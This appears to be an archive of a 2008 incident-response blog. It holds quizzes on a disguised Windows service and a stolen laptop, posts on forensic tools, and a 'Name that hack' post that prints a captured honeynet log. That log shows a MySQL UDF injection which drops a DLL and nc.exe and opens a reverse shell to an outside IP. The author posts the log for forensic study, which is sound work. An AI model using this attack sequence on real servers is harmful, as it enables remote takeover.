Monday, May 12, 2008

Spot the fake

When I've instructed people on IR I have run them through a live response scenario where the scenario is fairly obvious (I provide a friendly popup). My favorite thing to do to folks is transposition of letters in commonly associated programs and services. Apparently attackers still like doing this. Can you spot the fake? What are the inconsistencies between the two? Which one is real?
Finally..why does this work? Read this paper if you're interested.


Service Name: Event Log

Description: Enables event log messages issued by Windows-based programs and components to be viewed in Event Viewer. This service cannot be stopped.

Path to Executable:
C:\windows\system32\services.exe

Logon:
LocalSystem

Service Name: Events Log

Description: Enables event logs messages issued by Windows-based programs and components to be viewed in Event Viewer. This service cannot be stopped.

Path to Executable:
C:\WINDOWS\system32\drivers\csrss.exe -k NetworkService

Logon as:
.\Administrator

Posted by hogfly at 2:59 PM 0 comments

My arch-nemesis

Over the weekend my honeynet got pwned. I mean that in every sense of the word. I'm looking at a 50% rate of compromise. I contained the honeynet and planned on dealing with it this morning. While performing some live response on what I'd targeted as patient-0 my screen went black and my room suddenly got quiet. My office usually hums at about 70DB so when my poweredge server, firewall, precision workstation, switches, kvm, mac mini, 2 workstations AND MY HONEYNET go quiet it's pretty noticeable. I had been in the process of collecting physical memory and...poof.

At first I thought I had popped the breaker. Let's face it I have quite a bit plugged in. Then my thought process started up again...wait I've never popped the breaker..why all of a sudden?

There was a bit of shouting and people started running down the hall to see if I'd broken something..kind of funny. I then remembered something..electricians had been sighted early in the day. My subordinate confirmed this.

"I just saw someone run from that office in to the other room" he said pointing further down the hall.



I walked to the next office and poked my head in..

ME: "Hey are the electricians screwing with stuff?"

COWORKER: "They shouldn't be".

ME: "Well my office just went dark, where are they?"

COWORKER: "Oh, they're next door, let's go talk to them"

ME: "Probably a good idea".

We both poke our heads in to the next room and I spot a power whip laying in the middle of the floor as if to mock me and display the prowess of the master electrician and 3 guys looking at prints. On the wall I spot an open single gang box with wires mashed in a wire nut. That wall is the exact wall where I get power...

ME: "Are you guys messing with power in here?"

ELECTRICIAN: "We saw a few extra wires attached to that whip and had to disconnect it" he says looking at me sheepishly.

...silence...
...silence...
...silence..

ME: "You just took down my office".

ELECTRICIAN: "Yeah sorry about that, that's my bad. I had to disconnect the leads on that whip".

I was lost for words. My arch-nemesis killed all reasonable hope of me collecting information. The vm on bootup gave me some corrupted filesystem errors and the other virtual machines I had running had obviously lost power as well.

Why is the electrician my arch-nemesis you ask? Let's just say this isn't the first time they've struck.

Posted by hogfly at 1:49 PM 1 comments
Labels: ,

Thursday, April 24, 2008

my workstation...the porcupine

I was working on a case the other day and took a quick break and when I looked down at my workstation I thought to myself "my how my workstation looks like a porcupine". I had 5 USB dongles sticking out of the thing - one for each vendor who forces us to use dongles. In the old days of dongles we used to have the leaning tower of pisa because the parallel port dongles were so large. Is there no end to the dongle insanity? Why must each vendor require their own dongle - instead of forming a consortium, sitting down at a table and figuring out a few things. I know my life would be a little bit easier if I didn't have to keep track of all those porcupine quills.

Posted by hogfly at 6:13 AM 0 comments

Wednesday, April 23, 2008

Ripping the Registry Live

So I have been quiet lately and there's been quite a bit happening. First off, Harlan Carvey released RegRipper. This tool is impressive and awfully useful, not to mention NEEDED. If you haven't checked it out, do so. Harlan has said this tool is not designed for live response but I've been dying to get it in to a live response methodology. Well with F-Response I can do it now. Here goes ripping the registry live...sorry for my camtasia-fu or lack of.





A few things if you haven't registered with F-response.

The field kit requires that you put the dongle in the target system - This video starts after I've done that.
The connection is not encrypted - yet.

In addition, there's a new version of regripper out. This is just one of the many tools that F-response can facilitate the use of. See why it's so cool?

EDIT: I put the video up on youtube..blogger's video was just too small.
EDIT: Harlan corrected this statement for me: "Harlan has said this tool is not designed for live response." This should read "RegRipper is NOT intended to be run on live Registry hive files".
EDIT: I realized an error in the previous video. The new one is correct.

Posted by hogfly at 3:27 PM 2 comments
Labels: , ,

Friday, April 18, 2008

I'm excited

For the first time in quite a while I'm pretty excited. Just last week Matt Shannon released F-Response. F-response looks like it may shape up to be the best tool in my arsenal. Not because it makes analysis easier but because it facilitates analysis where it wasn't possible before and it does so in such a brilliant way that I'm just amazed. It also allows responders or examiners the opportunity to use the bulk of their toolkit safely and without the immense impact that many of our tools have on systems. When I've taught classes I specifically instruct people NOT to run AV, backups, and the other things that people like to execute to "investigate". This tool re-opens that door and can allow a first responder to actually respond to the incident, analyze with their typical toolset, and escalate when needed.

I'll be writing quite a bit about this tool and what can be done with it because I am just that excited about it.

Posted by hogfly at 8:19 AM 6 comments
Labels: ,

Wednesday, March 26, 2008

Name that hack

Today my honeynet was the victim of an oldie but goodie. It's time to play "NAME THAT HACK". What do you think is happening here?

A...
5.0.45-community-nt.^!..u"G|_G${.,.................c]+Yba?Ti4d{.
@..........@........................root....'NF.g".|Z/...=ao.nmysql.
...........
.....CREATE DATABASE nmxtmp
...........
.....USE nmxtmp
...........
/....CREATE TABLE cmd (codetab MEDIUMBLOB NOT NULL)
...........
( ...INSERT INTO cmd (codetab) VALUES ( 0x4d5a90000300000004000000ffff0000b800000000000000400000000000000000000000000000000000000000000000000000000000000000000000e00000000e1fba0e00b409cd21b8014ccd21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000e5915857a1f03604a1f03604a1f0360449ef3d04a0f0360422ec3804aaf0360449ef3c0489f03604a1f0370498f03604c3ef2504a2f0360449ef2004a0f0360449ef3204a0f0360452696368a1f0360400000000000000000000000000000000504500004c010400a64156440000000000000000e0000e210b010600005000000030000000000000bd1100000010000000600000000000100010000000100000040000000100000004000000000000000090000000100000000000000200000000001000001000000000100000100000000000001000000060690000800000009c64000028000000000000000000000000000000000000000000000000000000008000007004000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000600000d80000000000000000000000000000000000000000000000000000002e74657874000000b840000000100000005000
0000100000000000000000000000000000200000602e72646174610000e009 [Truncated by me])
...........
5....SELECT * INTO DUMPFILE '..\\bin\\mycmd.dll' FROM cmd
......."...
?....CREATE FUNCTION cmd_execute RETURNS integer SONAME 'mycmd.dll'
...........
.....DROP TABLE cmd
...........
.....DROP DATABASE nmxtmp
...........
.....FLUSH LOGS
...........
.....CREATE DATABASE nmxtmp
...........
.....USE nmxtmp
...........
/....CREATE TABLE cmd (codetab MEDIUMBLOB NOT NULL)
...........
(....INSERT INTO cmd (codetab) VALUES ( 0x4d5a90000300000004000000ffff0000b800000000000000400000000000000000000000000000000000000000000000000000000000000000000000800000000e1fba0e00b409cd21b8014ccd21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000504500004c010400b98eae340000000000000000e0000f010b010500009800000062000000000000004c00000010000000b0000000004000001000000002000004000000000000000400000000000000003001000004000000000000030000000000100000100000000010000010000000000000100000000000000000000000002001003c0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000a0210100640100000000000000000000000000000000000000000000000000002e7465787400000070970000001000000098000000040000000000000000000000000000200000602e726461746100001704000000b0000000060000009c0000000000000000000000000000400000402e646174610000004452000000c00000003e000000a200000000000000000000000000
00400000c02e696461746100005c070000002001000008000000e000 [truncated by me])
...........
3....SELECT * INTO DUMPFILE '..\\data\\nc.exe' FROM cmd
......."...
.....DROP TABLE cmd
...........
.....DROP DATABASE nmxtmp
...........
.....FLUSH LOGS
...........
D....SELECT cmd_execute('..\\data\\nc.exe 66.35.111.60 2095 -e cmd.exe')
.....R....def...cmd_execute('..\\data\\nc.exe 66.35.111.60 2095 -e cmd.exe')..?.........................537912269770588160.........
.....


Where would you begin your investigation?

Posted by hogfly at 3:40 PM 3 comments
Labels:

Thursday, March 20, 2008

When laptops grow legs

One fine day in Europe an American businessman was traveling by train. There was suddenly a large commotion occurring somewhere up ahead in the passenger car. The businessman set his laptop down on top of his laptop bag on the empty seat next to him and stood up to observe the commotion. There appeared to be an argument of some form between two gentlemen. As the businessman sat back down he reached over to grab his laptop, except it wasn't there. Looking all around, he didn't see anything that looked suspicious. The laptop had been stolen right out from under his nose..literally.

Upon arriving back home, the businessman alerted his IT support staff that his laptop had been stolen and that he needed a new one right away. Following policy, the IT staff member notified his security staff.

Does knowing what was on the laptop make a difference? What if you don't know what was on the laptop exactly. Can you trust that the businessman claims "there wasn't client data on there" or "There wasn't credit card information on my laptop".

Do you consider the laptop compromised automatically and look for a backup of the laptop to use as a reference point for notifying individuals? Do you ignore the fact that the system was stolen?

If a case like this gets turned over to you, how do you handle it?

Posted by hogfly at 8:35 PM 1 comments
Subscribe to: Posts (Atom)